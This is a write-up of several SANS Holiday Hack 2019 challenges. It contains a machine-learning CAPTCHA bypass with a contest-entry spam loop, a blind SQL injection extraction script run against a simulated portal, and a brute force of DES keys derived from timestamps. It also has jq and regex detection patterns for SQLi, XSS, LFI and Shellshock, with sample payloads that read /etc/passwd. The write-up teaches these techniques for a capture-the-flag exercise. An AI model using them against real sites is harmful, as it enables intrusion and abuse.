On entering the room, an individual runs off into a side room behind a locked door. So the first part of objective 7 seems to be cutting a key on the grinder that fits that lock.

To do this I left the room and came back. The person appeared again, and before they left I quickly grabbed a screenshot.

This proved helpful, as the person is wearing a key.
My process was to enlarge the screenshot and rotate it so that I could cut a key matching the bitting.
It worked: the bitting code is 122520 and the door opens.
Inside are the steam tunnels, and there is the person who ran off, Krampus Hollyfeld.
After talking with him, he says he is the one who borrowed the two turtle doves.
Objective 7 completed.

Objective 8 - Bypassing the Frido Sleigh CAPTEHA

Help Krampus beat the Frido Sleigh contest. For hints on achieving this objective, please talk with Alabaster Snowball in the Speaker Unpreparedness Room.

Location: Steam Tunnels

Initial Dialog - Krampus Hollyfeld

Hello there! I’m Krampus Hollyfeld. I maintain the steam tunnels underneath Elf U, Keeping all the elves warm and jolly. Though I spend my time in the tunnels and smoke, In this whole wide world, there’s no happier bloke! Yes, I borrowed Santa’s turtle doves for just a bit. Someone left some scraps of paper near that fireplace, which is a big fire hazard. I sent the turtle doves to fetch the paper scraps. But, before I can tell you more, I need to know that I can trust you. Tell you what – if you can help me beat the Frido Sleigh contest (Objective 8), then I’ll know I can trust you. The contest is here on my screen and at fridosleigh.com. No purchase necessary, enter as often as you want, so I am! They set up the rules, and lately, I have come to realize that I have certain materialistic, cookie needs. Unfortunately, it’s restricted to elves only, and I can’t bypass the CAPTEHA. (That’s Completely Automated Public Turing test to tell Elves and Humans Apart.) I’ve already cataloged 12,000 images and decoded the API interface. Can you help me bypass the CAPTEHA and submit lots of entries?


Technical

Watch the talk by Chris Davis on machine learning.
First download the images and train a model with the retrain.py script linked from the talk.
Once the model is trained, update the predict_images_using_trained_model.py script from the same materials.
Once that works and correctly recognizes the images, we apply the same logic to the challenge.

Krampus’s script makes an API call that returns 100 base64-encoded images together with their UUIDs.
Without going into too much detail, we update the script to:
1. decode the base64 images
2. save each one to a file named after its UUID
3. run the prediction script over them and submit the UUIDs in the requested categories to beat the CAPTEHA

The updated code is below.

After that works, we set our real email address in the script and wait.
Running the script submits a lot of entries.

From there we get an email confirmation that it worked :)

Updated Code: final_capteha_api.py

#!/usr/bin/env python3
# Fridosleigh.com CAPTEHA API - Made by Krampus Hollyfeld
import requests
import json
import sys
import base64
import os
import shutil
import glob

def main():
    yourREALemailAddress = "YourRealEmail@SomeRealEmailDomain.RealTLD"

    # Creating a session to handle cookies
    s = requests.Session()
    url = "https://fridosleigh.com/"

    json_resp = json.loads(s.get("{}api/capteha/request".format(url)).text)
    b64_images = json_resp['images']                    # A list of dictionaries each containing the keys 'base64' and 'uuid'
    challenge_image_type = json_resp['select_type'].split(',')     # The Image types the CAPTEHA Challenge is looking for.
    challenge_image_types = [challenge_image_type[0].strip(), challenge_image_type[1].strip(), challenge_image_type[2].replace(' and ','').strip()] # cleaning and formatting

    # --- begin custom code ---
    # Paths are from the author's environment; adjust to wherever the retrained
    # model and predict_images_using_trained_model.py live.
    workdir = '/home/bz/'
    unknown_dir = os.path.join(workdir, 'unknown_images')
    os.makedirs(unknown_dir, exist_ok=True)

    # Decode each base64 image straight to <uuid>.png in the directory the
    # prediction script reads from (no intermediate .txt files needed).
    for img in b64_images:
        with open(os.path.join(unknown_dir, '{}.png'.format(img['uuid'])), 'wb') as fw_out:
            fw_out.write(base64.b64decode(img['base64']))

    # The prediction script sorts each image into a directory (relative to the
    # current directory) named after the predicted category; file names are the UUIDs.
    os.system(os.path.join(workdir, 'predict_images_using_trained_model.py'))

    known_types = ['Stockings', 'Presents', 'Ornaments', 'Christmas Trees', 'Candy Canes', 'Santa Hats']
    uuids = []
    for image_type in challenge_image_types:
        if image_type not in known_types:
            break  # unexpected category name: stop, as the original version did
        uuids.extend(name.split('.')[0] for name in os.listdir(image_type))

    final_answer = ','.join(uuids)
    # --- end custom code ---

    # This should be JUST a csv list image uuids ML predicted to match the challenge_image_type .
    # final_answer = ','.join( [ img['uuid'] for img in b64_images ] )
    json_resp = json.loads(s.post("{}api/capteha/submit".format(url), data={'answer':final_answer}).text)
    if not json_resp['request']:
        # If it fails just run again. ML might get one wrong occasionally
        print('FAILED MACHINE LEARNING GUESS')
        print('--------------------\nOur ML Guess:\n--------------------\n{}'.format(final_answer))
        print('--------------------\nServer Response:\n--------------------\n{}'.format(json_resp['data']))
        sys.exit(1)

    print('CAPTEHA Solved!')
    # If we get to here, we are successful and can submit a bunch of entries till we win
    userinfo = {
        'name':'Krampus Hollyfeld',
        'email':yourREALemailAddress,   # must match the address the loop below looks for in the response
        'age':180,
        'about':"Cause they're so flippin yummy!",
        'favorites':'thickmints'
    }
    # If we win the once-per minute drawing, it will tell us we were emailed.
    # Should be no more than 200 times before we win. If more, somethings wrong.
    entry_response = ''
    entry_count = 1
    while yourREALemailAddress not in entry_response and entry_count < 200:
        print('Submitting lots of entries until we win the contest! Entry #{}'.format(entry_count))
        entry_response = s.post("{}api/entry".format(url), data=userinfo).text
        entry_count += 1
    print(entry_response)


if __name__ == "__main__":
    main()

Completed Dialog - Krampus Hollyfeld

You did it! Thank you so much. I can trust you! To help you, I have flashed the firmware in your badge to unlock a useful new feature: magical teleportation through the steam tunnels. As for those scraps of paper, I scanned those and put the images on my server. I then threw the paper away. Unfortunately, I managed to lock out my account on the server. Hey! You’ve got some great skills. Would you please hack into my system and retrieve the scans? I give you permission to hack into it, solving Objective 9 in your badge. And, as long as you’re traveling around, be sure to solve any other challenges you happen across.

alt text

Objective 9 - Retrieve Scraps of Paper from Server

Gain access to the data on the Student Portal server and retrieve the paper scraps hosted there. What is the name of Santa’s cutting-edge sleigh guidance system? For hints on achieving this objective, please visit the dorm and talk with Pepper Minstix.

Initial Dialog

See dialog with Pepper Minstix after completing Graylog Console Challenge

Technical

The portal is simply a way to register through a POST request against /application-request.php. We can then check our status using /application-check.php, but that is a GET request. In this request we can see that we pass the email we registered with and a token. After further inspection we can see this token comes from /validator.php.

We know we need to use sqlmap against either the GET or the POST request, but the token changes on every request, so we need a way to fetch a fresh one before each injection attempt. This was easy by setting up a macro in Burp that calls /validator.php first:
alt text
alt text
alt text

Then we use that macro in a session handling rule:
alt text
alt text

After that we run sqlmap through Burp as its proxy. We also need a tamper script, and we target the GET request against /application-check.php (the POST request didn't work):
alt text
alt text
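
As an added example (not part of the original writeup, and not the real portal), the script below simulates the two things that matter in this step: a single-use token that must be refreshed before every request, which is exactly what the Burp macro automates, and a boolean-based blind extraction loop of the kind sqlmap runs once it has that token. The portal stand-in is a constructed in-memory SQLite database; the endpoint names match the page, but the table and column names (applications, scans, elfmail, status, name) are assumptions, and the injected SQL uses SQLite functions (length, substr, unicode) where the real target would need its own dialect.

```python
import secrets
import sqlite3


class FakePortal:
    """Constructed stand-in for the Student Portal: two 'endpoints' in front of
    an in-memory SQLite database. Schema and data are assumptions."""

    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.executescript("""
            CREATE TABLE applications (elfmail TEXT, status TEXT);
            CREATE TABLE scans (name TEXT);
            INSERT INTO applications VALUES ('elf@elfu.org', 'pending');
            INSERT INTO scans VALUES ('Super Sled-o-matic');
        """)
        self.tokens = set()
        self.requests = 0

    def validator(self):
        """GET /validator.php: mint a token that is valid for one request."""
        token = secrets.token_hex(8)
        self.tokens.add(token)
        return token

    def application_check(self, elfmail, token):
        """GET /application-check.php?elfmail=...&token=...  (vulnerable)."""
        self.requests += 1
        if token not in self.tokens:
            return "Invalid token"
        self.tokens.discard(token)  # single use: a replayed token is rejected
        # The flaw: user input concatenated straight into the query
        query = f"SELECT status FROM applications WHERE elfmail = '{elfmail}'"
        try:
            row = self.db.execute(query).fetchone()
        except sqlite3.Error:
            return "Error"
        return f"Status: {row[0]}" if row else "No application found"


def check_with_fresh_token(portal, elfmail):
    """What the Burp macro does: hit /validator.php before every request."""
    return portal.application_check(elfmail, portal.validator())


def oracle(portal, condition):
    """Boolean-based blind oracle: the row comes back only if condition holds."""
    payload = f"elf@elfu.org' AND ({condition}) -- "
    return check_with_fresh_token(portal, payload).startswith("Status:")


def extract(portal, subquery, max_len=64):
    """Recover the result of subquery one character at a time, with a binary
    search over printable ASCII (about seven requests per character)."""
    result = ""
    for pos in range(1, max_len + 1):
        if not oracle(portal, f"length(({subquery})) >= {pos}"):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(portal, f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    portal = FakePortal()
    name = extract(portal, "SELECT name FROM scans")
    print(f"{name!r} recovered in {portal.requests} requests")
```

The rotating token costs the attacker one extra request per probe and nothing more; it is not a defence against injection. Parameterising the query is: with `self.db.execute("SELECT status FROM applications WHERE elfmail = ?", (elfmail,))` the oracle never returns True for an injected condition.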

From there we get the scraps of paper:
alt text
alt text
alt text
alt text
alt text
alt text

Going through these we make out the answer to be Super Sled-o-matic:
alt text

Objective 10 - Recover Cleartext Document

The Elfscrow Crypto tool is a vital asset used at Elf University for encrypting SUPER SECRET documents. We can’t send you the source, but we do have debug symbols that you can use. Recover the plaintext content for this encrypted document. We know that it was encrypted on December 6, 2019, between 7pm and 9pm UTC. What is the middle line on the cover page? (Hint: it’s five words) For hints on achieving this objective, please visit the NetWars room and talk with Holly Evergreen.

Initial Dialog - Holly Evergreen

See dialog from Mongo Pilfer

Additional Dialog - Krampus Hollyfeld

Wow! We’ve uncovered quite a nasty plot to destroy the holiday season. We’ve gotta stop whomever is behind it! I managed to find this protected document on one of the compromised machines in our environment. I think our attacker was in the process of exfiltrating it. I’m convinced that it is somehow associated with the plan to destroy the holidays. Can you decrypt it? There are some smart people in the NetWars challenge room who may be able to help us.

Technical

Watch the video from Ron Bowes on reversing crypto and download all the files.

Running the .exe we see we can encrypt and decrypt files. Our key is also pushed to the elfscrow server.
alt text

alt text

alt text
Looking at the .exe combined with the symbols .pdb file in IDA, we first need to determine how the key is being generated.
We determine that it is the Microsoft CRT linear congruential generator (LCG), based on the following:
alt text
From there we check whether we can generate the same key from the provided seed and that formula. Success!
alt text
Next we determine that the seed is the Unix epoch time (https://www.epochconverter.com/) at which the file was encrypted, and we know the date/time range in which the encrypted file was created.

Knowing how to generate the key from a seed, and the range of possible seeds, lets us write a script that loops through every seed and tests decryption. The window is December 6, 2019, 19:00 to 21:00 UTC, i.e. seeds 1575658800 through 1575666000, so there are only 7200 candidate keys instead of DES's 2^56.

The code below loops through those 7200 seeds, writing one output file per seed.

Decrypt code - decrypt.rb

require 'openssl'

KEY_LENGTH = 8

# Microsoft CRT rand(): state = state * 214013 + 2531011 (mod 2^32). Elfscrow seeds
# it with the epoch time and uses the low byte of (state >> 16) as each key byte.
def generate_key(seed)
  key = ""
  1.upto(KEY_LENGTH) do
    key += (((seed = (214013 * seed + 2531011) & 0x7fff_ffff) >> 16) & 0x0FF).chr
  end
  return key
end

# DES-CBC with the derived 8-byte key. No IV is set, so OpenSSL decrypts with an
# all-zero IV; final() raises CipherError when the PKCS#7 padding is wrong, which
# is how a wrong key gets rejected below.
def decrypt(data, key)
  c = OpenSSL::Cipher::DES.new('CBC')
  c.decrypt
  c.key = key
  return (c.update(data) + c.final())
end

# Read the ciphertext once, in binary mode
data = File.binread("ElfUResearchLabsSuperSledOMaticQuickStartGuideV1.2.pdf.enc")

# Dec 6 2019 19:00 UTC = 1575658800, 21:00 UTC = 1575666000: one seed per second
i = 1575666001
while i > 1575658800
  i -= 1
  key = generate_key(i)
  begin
    File.open("#{i}.pdf", "wb") do |outf|
      outf.write(decrypt(data, key))
    end
  rescue OpenSSL::Cipher::CipherError
    # wrong key: nothing was written, so the file is left empty
  end
end

Sorting through the files, the majority are zero bytes (the padding check failed, so nothing was written), but a few have data: a wrong key passes the PKCS#7 padding check about one time in 256 and produces garbage. Note that on OpenSSL 3.x single DES lives in the legacy provider, so OpenSSL::Cipher::DES.new may fail as unsupported until that provider is loaded.
After some looking we find 1575663650.pdf is our winner:
alt text

Answer is “Machine Learning Sleigh Route Finder”

alt text
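
The same brute force in Python, as an added example rather than the writeup's own code, with two changes a practitioner would want: the candidate seeds are derived from the UTC window with explicit timezone handling instead of being hard-coded, and every candidate plaintext is checked for the %PDF- magic so the one real hit is reported instead of 7200 files. The DES primitive is injected; the adapter shown uses PyCryptodome, which is an assumption (the Ruby above used OpenSSL), and the all-zero IV matches the Ruby script, which sets none.

```python
from datetime import datetime, timezone


def msvc_rand(state):
    """Microsoft CRT rand(), as recovered from the Elfscrow binary in IDA:
    state = state * 214013 + 2531011 (mod 2^32); rand() = (state >> 16) & 0x7fff."""
    state = (state * 214013 + 2531011) & 0xFFFFFFFF
    return state, (state >> 16) & 0x7FFF


def elfscrow_key(seed):
    """Seed rand() with the epoch time and take the low byte of eight successive
    outputs as the 8-byte DES key (the same derivation as the Ruby generate_key)."""
    key = bytearray()
    state = seed
    for _ in range(8):
        state, r = msvc_rand(state)
        key.append(r & 0xFF)
    return bytes(key)


def window_seeds(start, end):
    """Every epoch-second seed in the encryption window, inclusive.
    start/end are (year, month, day, hour) tuples in UTC."""
    s = int(datetime(*start, tzinfo=timezone.utc).timestamp())
    e = int(datetime(*end, tzinfo=timezone.utc).timestamp())
    return range(s, e + 1)


def looks_like_pdf(plaintext):
    return plaintext.startswith(b"%PDF-")


def brute_force(ciphertext, seeds, des_cbc_decrypt, iv=bytes(8), check=looks_like_pdf):
    """Try every seed. des_cbc_decrypt(key, iv, data) must return the unpadded
    plaintext or raise ValueError when the PKCS#7 padding is wrong, which is what
    almost every wrong key does. The all-zero IV is an assumption (the Ruby script
    sets none). Returns (seed, plaintext) for the first candidate that passes check."""
    for seed in seeds:
        try:
            plaintext = des_cbc_decrypt(elfscrow_key(seed), iv, ciphertext)
        except ValueError:
            continue
        if check(plaintext):
            return seed, plaintext
    return None


def pycryptodome_des_cbc(key, iv, data):
    """DES-CBC adapter for PyCryptodome (assumed installed: pip install pycryptodome);
    unpad() raises ValueError on a bad pad."""
    from Crypto.Cipher import DES
    from Crypto.Util.Padding import unpad
    return unpad(DES.new(key, DES.MODE_CBC, iv=iv).decrypt(data), DES.block_size)


if __name__ == "__main__":
    import sys
    ciphertext = open(sys.argv[1], "rb").read()
    seeds = window_seeds((2019, 12, 6, 19), (2019, 12, 6, 21))
    hit = brute_force(ciphertext, seeds, pycryptodome_des_cbc)
    if hit is None:
        sys.exit("no seed in the window yields a PDF")
    seed, plaintext = hit
    open(f"{seed}.pdf", "wb").write(plaintext)
    print(f"seed {seed} key {elfscrow_key(seed).hex()} -> {seed}.pdf")
```

Run it as `python3 elfscrow_brute.py ElfUResearchLabsSuperSledOMaticQuickStartGuideV1.2.pdf.enc`. The lesson is the key space, not the cipher: a 56-bit DES key derived from a timestamp the attacker can bound to a two-hour window is a 13-bit key.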

Objective 11 - Open the Sleigh Shop Door

Visit Shinny Upatree in the Student Union and help solve their problem. What is written on the paper you retrieve for Shinny? For hints on achieving this objective, please visit the Student Union and talk with Kent Tinseltooth.

Location: Student Union

Initial Dialog - Shinny Upatree

Psst - hey! I’m Shinny Upatree, and I know what’s going on! Yeah, that’s right - guarding the sleigh shop has made me privy to some serious, high-level intel. In fact, I know WHO is causing all the trouble. Cindy? Oh no no, not that who. And stop guessing - you’ll never figure it out. The only way you could would be if you could break into my crate, here. You see, I’ve written the villain’s name down on a piece of paper and hidden it away securely!

alt text

Additional Dialog - Kent Tinseltooth

See dialog with Kent Tinseltooth after completing Smart Braces Console Challenge

Technical

Using Google Chrome Inspect (DevTools), each lock's code is hidden somewhere in the page:
alt text
found in the Console
alt text

alt text
found in the print preview of the page
alt text

alt text
found by refreshing with the Network panel open and looking at the loaded files
alt text
alt text

alt text
found in Local Storage
alt text

alt text
found in the title in the DOM tree
alt text

alt text
find the CSS perspective value and decrease it to nothing
alt text

alt text
find the font-family
alt text

alt text
found in the event listeners on the eggs
alt text

alt text
find the chakra code elements and activate each one
alt text

alt text
find the images loaded and you will see an inside image that shows a circuit board with the code
alt text
Entering it gives a macaroni error?!? alt text
To complete the rest we need to find three elements, macaroni, swab and gnome, using Ctrl-F to search the DOM,
alt text
then move them after the button switch.
alt text
After that the lock works and we finish.

We get the villain's name:
alt text

Completed Dialog - Shinny Upatree

Wha - what?? You got into my crate?! Well that’s embarrassing… But you know what? Hmm… If you’re good enough to crack MY security… Do you think you could bring this all to a grand conclusion? Please go into the sleigh shop and see if you can finish this off! Stop the Tooth Fairy from ruining Santa’s sleigh route!

alt text

Console - Zeek JSON Analysis

Location - Sleigh Shop

Initial Dialog - Wunorse Openslae

Wunorse Openslae here, just looking at some Zeek logs. I’m pretty sure one of these connections is a malicious C2 channel… Do you think you could take a look? I hear a lot of C2 channels have very long connection times. Please use jq to find the longest connection in this data set. We have to kick out any and all grinchy activity!

Zeek Post
alt text

Technical

Read the post linked above and looked to see what file was on the console:
alt text
Running the same jq command from the post finds the answer: 13.107.21.200
alt text

Completed Dialog - Wunorse Openslae

That’s got to be the one - thanks! Hey, you know what? We’ve got a crisis here. You see, Santa’s flight route is planned by a complex set of machine learning algorithms which use available weather data. All the weather stations are reporting severe weather to Santa’s Sleigh. I think someone might be forging intentionally false weather data! I’m so flummoxed I can’t even remember how to login! Hmm… Maybe the Zeek http.log could help us. I worry about LFI, XSS, and SQLi in the Zeek log - oh my! And I’d be shocked if there weren’t some shell stuff in there too. I’ll bet if you pick through, you can find some naughty data from naughty hosts and block it in the firewall. If you find a log entry that definitely looks bad, try pivoting off other unusual attributes in that entry to find more bad IPs. The sleigh’s machine learning device (SRF) needs most of the malicious IPs blocked in order to calculate a good route. Try not to block many legitimate weather station IPs as that could also cause route calculation failure. Remember, when looking at JSON data, jq is the tool for you!

Objective 12 - Filter Out Poisoned Sources of Weather Data

Use the data supplied in the Zeek JSON logs to identify the IP addresses of attackers poisoning Santa’s flight mapping software. Block the 100 offending sources of information to guide Santa’s sleigh through the attack. Submit the Route ID (“RID”) success value that you’re given. For hints on achieving this objective, please visit the Sleigh Shop and talk with Wunorse Openslae.

Initial Dialog - The Tooth Fairy

I’m the Tooth Fairy, the mastermind behind the plot to destroy the holiday season. I hate how Santa is so beloved, but only works one day per year! He has all of the resources of the North Pole and the elves to help him too. I run a solo operation, toiling year-round collecting deciduous bicuspids and more from children. But I get nowhere near the gratitude that Santa gets. He needs to share his holiday resources with the rest of us! But, although you found me, you haven’t foiled my plot! Santa’s sleigh will NOT be able to find its way. I will get my revenge and respect! I want my own holiday, National Tooth Fairy Day, to be the most popular holiday on the calendar!!!

alt text

Additional Dialog - Krampus Hollyfeld

But there’s still time! Solve the final challenge in your badge by blocking the bad IPs at srf.elfu.org and save the holiday season!

Technical

Looking at the website we see we need to log in.
alt text
After a bit I looked at the PDF we just decrypted, and there was a hint:
alt text
Viewing the readme gives the credentials and we're in:
alt text
Poking around we see where we need to enter the bad IPs to block:
alt text
We apply the same jq approach we learned in the console challenge, but now need to find the offending IPs that are attacking via SQLi, XSS, LFI and Shellshock.
This part is pretty straightforward: we build a script that looks for each attack type in the relevant field (a single quote for SQLi, a script tag for XSS, a password-file read for LFI and the "() { :;" marker for Shellshock):

#!/bin/bash
# Each filter selects http.log records whose field carries an attack pattern and
# prints the client IP (id.orig_h). '"'"' is a literal single quote inside the
# single-quoted jq program; // "" guards against records with the field unset.
#SQLi: a single quote in username, uri or user_agent
jq -r '.[] | select((.username // "") | contains("'"'"'")) | .["id.orig_h"]' http.log > bad_srf_ips
jq -r '.[] | select((.uri // "") | contains("'"'"'")) | .["id.orig_h"]' http.log >> bad_srf_ips
jq -r '.[] | select((.user_agent // "") | contains("'"'"'")) | .["id.orig_h"]' http.log >> bad_srf_ips
#XSS: script tags in the uri or host header
jq -r '.[] | select((.uri // "") | contains("<script>")) | .["id.orig_h"]' http.log >> bad_srf_ips
jq -r '.[] | select((.host // "") | contains("<script>")) | .["id.orig_h"]' http.log >> bad_srf_ips
#LFI: password-file reads in the uri
jq -r '.[] | select((.uri // "") | contains("pass")) | .["id.orig_h"]' http.log >> bad_srf_ips
#Shellshock: the "() { :;" function-definition marker in the user_agent
jq -r '.[] | select((.user_agent // "") | contains(":;")) | .["id.orig_h"]' http.log >> bad_srf_ips

sort -u bad_srf_ips > bad_ips

Running this script against http.log and then doing a line count, we find 75 bad IPs. Unfortunately this isn't enough (knew it couldn't be that easy).

Looking around we find that the attacking IPs reuse the same unusual user agents, and other IPs sending those user agents made requests that did not trip any of the signatures above. So we pivot on the user agent: find every request from the known-bad IPs and capture the list of user agents they used. We tack the following on to our script (the IPs are the 75 from bad_ips):

jq -r '.[] | select(.["id.orig_h"] == "0.216.249.31" or .["id.orig_h"] == "10.155.246.29" or .["id.orig_h"] == "102.143.16.184" or .["id.orig_h"] == "106.132.195.153" or .["id.orig_h"] == "106.93.213.219" or .["id.orig_h"] == "111.81.145.191" or .["id.orig_h"] == "116.116.98.205" or .["id.orig_h"] == "118.196.230.170" or .["id.orig_h"] == "1.185.21.112" or .["id.orig_h"] == "121.7.186.163" or .["id.orig_h"] == "123.127.233.97" or .["id.orig_h"] == "129.121.121.48" or .["id.orig_h"] == "131.186.145.73" or .["id.orig_h"] == "132.45.187.177" or .["id.orig_h"] == "13.39.153.254" or .["id.orig_h"] == "135.203.243.43" or .["id.orig_h"] == "135.32.99.116" or .["id.orig_h"] == "150.45.133.97" or .["id.orig_h"] == "150.50.77.238" or .["id.orig_h"] == "168.66.108.62" or .["id.orig_h"] == "169.242.54.5" or .["id.orig_h"] == "173.37.160.150" or .["id.orig_h"] == "180.57.20.247" or .["id.orig_h"] == "186.28.46.179" or .["id.orig_h"] == "187.178.169.123" or .["id.orig_h"] == "190.245.228.38" or .["id.orig_h"] == "19.235.69.221" or .["id.orig_h"] == "193.228.194.36" or .["id.orig_h"] == "194.143.151.224" or .["id.orig_h"] == "200.75.228.240" or .["id.orig_h"] == "211.229.3.254" or .["id.orig_h"] == "220.132.33.81" or .["id.orig_h"] == "2.230.60.70" or .["id.orig_h"] == "223.149.180.133" or .["id.orig_h"] == "2.240.116.254" or .["id.orig_h"] == "225.191.220.138" or .["id.orig_h"] == "227.110.45.126" or .["id.orig_h"] == "229.133.163.235" or .["id.orig_h"] == "229.229.189.246" or .["id.orig_h"] == "230.246.50.221" or .["id.orig_h"] == "233.74.78.199" or .["id.orig_h"] == "23.49.177.78" or .["id.orig_h"] == "238.143.78.114" or .["id.orig_h"] == "249.34.9.16" or .["id.orig_h"] == "250.51.219.47" or .["id.orig_h"] == "253.182.102.55" or .["id.orig_h"] == "254.140.181.172" or .["id.orig_h"] == "25.80.197.172" or .["id.orig_h"] == "27.88.56.114" or .["id.orig_h"] == "28.169.41.122" or .["id.orig_h"] == "31.254.228.4" or .["id.orig_h"] == "33.132.98.193" or .["id.orig_h"] == 
"34.129.179.28" or .["id.orig_h"] == "42.103.246.250" or .["id.orig_h"] == "42.191.112.181" or .["id.orig_h"] == "44.74.106.131" or .["id.orig_h"] == "45.239.232.245" or .["id.orig_h"] == "48.66.193.176" or .["id.orig_h"] == "49.161.8.58" or .["id.orig_h"] == "52.39.201.107" or .["id.orig_h"] == "56.5.47.137" or .["id.orig_h"] == "61.110.82.125" or .["id.orig_h"] == "65.153.114.120" or .["id.orig_h"] == "68.115.251.76" or .["id.orig_h"] == "69.221.145.150" or .["id.orig_h"] == "75.215.214.65" or .["id.orig_h"] == "75.73.228.192" or .["id.orig_h"] == "79.198.89.109" or .["id.orig_h"] == "80.244.147.207" or .["id.orig_h"] == "81.14.204.154" or .["id.orig_h"] == "83.0.8.119" or .["id.orig_h"] == "84.147.231.129" or .["id.orig_h"] == "84.185.44.166" or .["id.orig_h"] == "9.206.212.33" or .["id.orig_h"] == "95.166.116.45" ) | .user_agent' http.log > bad_user_agent

My hope was to automate this through a script, but I just wanted to get it done. It didn't happen.

We get the requests and need to:
1. put a double slash in front of all the single slashes in the malicious user agents
2. add quotes around each user agent
3. run a while loop over http.log checking each record against the list of bad user agents

while read ua; do jq '.[] | select(."user_agent" == '"$ua"')' http.log; done < updated_bad_user_agent > pre_final

4. then output the IPs from that result to a new file (the field is id.orig_h, with a dot)

jq '.["id.orig_h"]' pre_final > final_ips

5. then remove the double quotes

tr -d '"' < final_ips > final_final_ips

6. running the line count we get 93 IPs

Adding these IPs as Deny, the route recalculates and it’s successful!
alt text

Entering this RID number in completes the final objective
alt text
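
The two stages above, signature matching and a pivot on the user agent, as an added Python example that is not the author's script. The input is a constructed JSON array in the same layout the jq commands assume (the 10.0.0.x weather stations and every other address and user agent are made up). It also adds the guard Wunorse's hint asks for: a user agent shared by many distinct hosts is not used as a pivot, because blocking everything that sends a common browser string would take legitimate weather stations with it. The max_fanout threshold is this example's heuristic, not something the page specifies.

```python
import json
import re

# Constructed sample log: a JSON array of Zeek http.log records, as on this page.
BENIGN_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0"
ODD_UA = "HolidayHacker/1.0"
SAMPLE_HTTP_LOG = json.dumps(
    [{"id.orig_h": f"10.0.0.{i}", "host": "srf.elfu.org", "uri": f"/api/weather?station={i}",
      "username": "-", "user_agent": BENIGN_UA} for i in range(1, 6)]
    + [
        {"id.orig_h": "198.51.100.7", "host": "srf.elfu.org", "uri": "/api/login",
         "username": "' OR 1=1 -- ", "user_agent": ODD_UA},
        {"id.orig_h": "198.51.100.9", "host": "srf.elfu.org", "uri": "/api/weather?station=9",
         "username": "-", "user_agent": ODD_UA},  # clean request, attacker's user agent
        {"id.orig_h": "203.0.113.4", "host": "srf.elfu.org",
         "uri": "/search?q=<script>alert(1)</script>", "username": "-", "user_agent": BENIGN_UA},
        {"id.orig_h": "203.0.113.8", "host": "srf.elfu.org", "uri": "/cgi-bin/status",
         "username": "-", "user_agent": "() { :; }; /bin/bash -c 'cat /etc/passwd'"},
        {"id.orig_h": "192.0.2.3", "host": "srf.elfu.org",
         "uri": "/index.php?page=../../../../etc/passwd", "username": "-", "user_agent": "curl/7.64.1"},
    ]
)

# Stage-1 signatures, one per attack class the hint names; deliberately loose,
# like the contains() filters in the jq script.
SIGNATURES = {
    "sqli": re.compile(r"'|\bunion\b|\bor\s+1=1", re.I),
    "xss": re.compile(r"<script|javascript:|onerror=", re.I),
    "lfi": re.compile(r"\.\./|/etc/passwd|/etc/shadow", re.I),
    "shellshock": re.compile(r"\(\)\s*\{\s*:;\s*\}"),
}
FIELDS = ("uri", "username", "user_agent", "host")


def load_records(text):
    """Accept either a JSON array (as on this page) or Zeek's native NDJSON."""
    text = text.strip()
    if text.startswith("["):
        return json.loads(text)
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def signature_hits(records):
    """Stage 1: source IP -> set of attack classes seen in any inspected field."""
    hits = {}
    for r in records:
        for field in FIELDS:
            value = r.get(field) or ""  # Zeek omits unset fields; jq chokes on null
            for name, rx in SIGNATURES.items():
                if rx.search(value):
                    hits.setdefault(r["id.orig_h"], set()).add(name)
    return hits


def pivot_on_user_agent(records, bad_ips, max_fanout=5):
    """Stage 2: a user agent seen from a known-bad IP becomes an indicator, and
    every other IP that sent it is added. A user agent shared by more than
    max_fanout distinct IPs is too common to be an indicator and is skipped."""
    ips_by_ua = {}
    for r in records:
        ips_by_ua.setdefault(r.get("user_agent", ""), set()).add(r["id.orig_h"])
    blocked = set(bad_ips)
    for ua, ips in ips_by_ua.items():
        if ips & bad_ips and len(ips) <= max_fanout:
            blocked |= ips
    return blocked


def deny_list(text, max_fanout=5):
    """Full pipeline: signature hits, then the user-agent pivot, as a sorted list."""
    records = load_records(text)
    stage1 = set(signature_hits(records))
    return sorted(pivot_on_user_agent(records, stage1, max_fanout))


if __name__ == "__main__":
    import sys
    source = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_HTTP_LOG
    print("\n".join(deny_list(source)))
```

On the sample, stage 1 flags four hosts and the pivot adds 198.51.100.9, which never sent a malicious request but shares the attacker's user agent; the Firefox string is left alone because six hosts use it. Raising max_fanout high enough to pivot on it would also block all five weather stations, which is the route-calculation failure the hint warns about.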

Ending

Location: Bell Tower

Dialog - Tooth Fairy

You foiled my dastardly plan! I’m ruined! And I would have gotten away with it too, if it weren’t for you meddling kids!

Dialog - Krampus

Congratulations on a job well done! Oh, by the way, I won the Frido Sleigh contest. I got 31.8% of the prizes, though I’ll have to figure that out.

Dialog - Santa

You did it! Thank you! You uncovered the sinister plot to destroy the holiday season! Through your diligent efforts, we’ve brought the Tooth Fairy to justice and saved the holidays! Ho Ho Ho! The more I laugh, the more I fill with glee. And the more the glee, The more I’m a merrier me! Merry Christmas and Happy Holidays.

alt text

There is actually a letter in the upper left-hand corner as well:

alt text

Written on January 3, 2020